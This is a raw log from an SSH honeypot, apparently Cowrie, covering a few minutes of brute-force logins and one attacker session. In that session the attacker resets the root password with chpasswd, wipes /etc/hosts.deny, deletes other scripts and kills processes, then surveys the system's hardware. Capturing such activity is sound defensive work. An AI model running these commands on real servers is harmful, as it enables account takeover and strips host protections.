{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:41:49.036542Z","src_ip":"189.63.32.160","session":"757d0f5280dc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:41:50.018734Z","src_ip":"189.63.32.160","session":"757d0f5280dc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:41:51.256858Z","src_ip":"189.63.32.160","session":"757d0f5280dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37590,"dst_ip":"1.2.3.4","dst_port":22,"session":"01ae3993e826","protocol":"ssh","message":"New connection: 212.227.235.229:37590 (1.2.3.4:22) [session: 01ae3993e826]","sensor":"my-vps","timestamp":"2025-09-08T14:41:51.942183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:41:51.943388Z","src_ip":"212.227.235.229","session":"01ae3993e826"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:41:52.062278Z","src_ip":"212.227.235.229","session":"01ae3993e826"}
{"eventid":"cowrie.login.failed","username":"build","password":"!","message":"login attempt [build/!] failed","sensor":"my-vps","timestamp":"2025-09-08T14:41:52.578990Z","src_ip":"212.227.235.229","session":"01ae3993e826"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:41:53.700383Z","src_ip":"212.227.235.229","session":"01ae3993e826"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:41:59.552497Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T14:41:59.553438Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:41:59.791083Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:00.280418Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"echo \"root:RJnhKwYvpUkp\"|chpasswd|bash","message":"CMD: echo \"root:RJnhKwYvpUkp\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T14:42:00.281102Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/17ad5cc3f90190c4f3571a70bc0a03266b22661b045aa387bb9b24780e9f8b3d","size":21,"shasum":"17ad5cc3f90190c4f3571a70bc0a03266b22661b045aa387bb9b24780e9f8b3d","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/17ad5cc3f90190c4f3571a70bc0a03266b22661b045aa387bb9b24780e9f8b3d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:00.517431Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:01.054269Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T14:42:01.055018Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T14:42:01.294761Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:01.295845Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:01.827959Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T14:42:01.828705Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:02.067951Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:02.556566Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T14:42:02.557327Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:02.795407Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:03.357766Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T14:42:03.358501Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T14:42:03.359090Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:03.598255Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:04.087897Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T14:42:04.088611Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:04.325738Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:04.885880Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T14:42:04.886562Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:05.123330Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:05.649579Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T14:42:05.650380Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:05.887657Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:06.378209Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T14:42:06.379247Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:06.617008Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:07.177212Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T14:42:07.177913Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:07.415627Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:07.905053Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T14:42:07.905758Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:08.143025Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:08.692394Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T14:42:08.693058Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:08.929853Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:09.499918Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T14:42:09.500674Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:09.737659Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:10.225652Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T14:42:10.226437Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:10.464068Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:42:11.038146Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T14:42:11.038846Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:11.277486Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.closed","duration":"25.4","message":"Connection lost after 25.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:11.278859Z","src_ip":"189.63.32.160","session":"a1c3d00acd34"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44676,"dst_ip":"1.2.3.4","dst_port":22,"session":"afefef08e656","protocol":"ssh","message":"New connection: 212.227.235.229:44676 (1.2.3.4:22) [session: afefef08e656]","sensor":"my-vps","timestamp":"2025-09-08T14:42:15.639799Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:42:15.747103Z","src_ip":"212.227.235.229","session":"afefef08e656"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.143.51","src_port":28486,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c6e9f7565fc","protocol":"ssh","message":"New connection: 101.126.143.51:28486 (1.2.3.4:22) [session: 7c6e9f7565fc]","sensor":"my-vps","timestamp":"2025-09-08T14:42:22.062039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:42:22.911953Z","src_ip":"101.126.143.51","session":"7c6e9f7565fc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-08T14:42:22.912839Z","src_ip":"101.126.143.51","session":"7c6e9f7565fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46438,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7bbfda683b9","protocol":"ssh","message":"New connection: 212.227.235.229:46438 (1.2.3.4:22) [session: b7bbfda683b9]","sensor":"my-vps","timestamp":"2025-09-08T14:42:59.402814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:42:59.403729Z","src_ip":"212.227.235.229","session":"b7bbfda683b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:42:59.521835Z","src_ip":"212.227.235.229","session":"b7bbfda683b9"}
{"eventid":"cowrie.login.failed","username":"rocky","password":"pass","message":"login attempt [rocky/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T14:43:00.035641Z","src_ip":"212.227.235.229","session":"b7bbfda683b9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:43:01.157980Z","src_ip":"212.227.235.229","session":"b7bbfda683b9"}
{"eventid":"cowrie.session.connect","src_ip":"101.126.143.51","src_port":61128,"dst_ip":"1.2.3.4","dst_port":22,"session":"d345347361f0","protocol":"ssh","message":"New connection: 101.126.143.51:61128 (1.2.3.4:22) [session: d345347361f0]","sensor":"my-vps","timestamp":"2025-09-08T14:43:07.439255Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":40490,"dst_ip":"1.2.3.4","dst_port":22,"session":"336afe13a1f8","protocol":"ssh","message":"New connection: 185.255.91.51:40490 (1.2.3.4:22) [session: 336afe13a1f8]","sensor":"my-vps","timestamp":"2025-09-08T14:43:27.640122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:43:27.640780Z","src_ip":"185.255.91.51","session":"336afe13a1f8"}
